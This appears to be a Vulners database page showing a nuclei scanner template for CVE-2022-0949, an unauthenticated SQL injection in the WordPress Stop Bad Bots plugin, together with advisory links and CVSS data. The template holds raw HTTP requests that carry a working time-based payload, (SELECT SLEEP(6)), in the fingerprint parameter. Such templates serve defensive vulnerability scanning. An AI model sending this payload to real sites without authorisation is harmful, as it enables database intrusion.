Lucene search
K

WordPress Stop Bad Bots <6.930 - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

WordPress Stop Bad Bots <6.930 - SQL Injection vulnerability. Unsanitised input in stopbadbots_grava_fingerprint AJAX action allows unauthorized SQL queries

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-0949
11 Apr 202215:15
attackerkb
Circl
CVE-2022-0949
11 Apr 202218:15
circl
CNNVD
WordPress plugin stopbadbots SQL注入漏洞
11 Apr 202200:00
cnnvd
CVE
CVE-2022-0949
11 Apr 202214:40
cve
Cvelist
CVE-2022-0949 WP Block and Stop Bad Bots < 6.930 - Unauthenticated SQLi
11 Apr 202214:40
cvelist
NVD
CVE-2022-0949
11 Apr 202215:15
nvd
OSV
CVE-2022-0949
11 Apr 202215:15
osv
Patchstack
WordPress Stop Bad Bots plugin <= 6.92 - Unauthenticated SQL Injection (SQLi) vulnerability
16 Mar 202200:00
patchstack
Prion
Sql injection
11 Apr 202215:15
prion
RedhatCVE
CVE-2022-0949
9 Jan 202610:44
redhatcve
Rows per page
id: CVE-2022-0949

info:
  name: WordPress Stop Bad Bots <6.930 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Stop Bad Bots plugin before 6.930 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: Fixed in version 6.930.
  reference:
    - https://wpscan.com/vulnerability/a0fbb79a-e160-49df-9cf2-18ab64ea66cb
    - https://wordpress.org/plugins/stopbadbots/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0949
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0949
    cwe-id: CWE-89
    epss-score: 0.07867
    epss-percentile: 0.93986
    cpe: cpe:2.3:a:stopbadbots:block_and_stop_bad_bots:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: stopbadbots
    product: block_and_stop_bad_bots
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,stopbadbots,wp-plugin,wp,unauth,wpscan,sqli,wordpress,vuln
variables:
  IP: '{{rand_ip("1.1.1.0/24")}}'

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        X-Real-IP: {{IP}}
        Content-Type: application/x-www-form-urlencoded

        action=stopbadbots_grava_fingerprint&fingerprint=0
      - |
        @timeout 10s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        X-Real-IP: {{IP}}
        Content-Type: application/x-www-form-urlencoded

        action=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(6))
      - |
        GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration_2>=6'
          - 'status_code_2 == 200'
          - 'contains(body_3, "commentform")'
        condition: and
# digest: 4b0a00483046022100b9090a3e92b89b4b7b03f817a1eaa5dc36f4fc5dacfeaa51aa8b0c0eae797e65022100ca4db79bd87d350cb97afe58276b8ab7d528d112f6585e3eff5d48b4b253d864:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
EPSS0.07867
31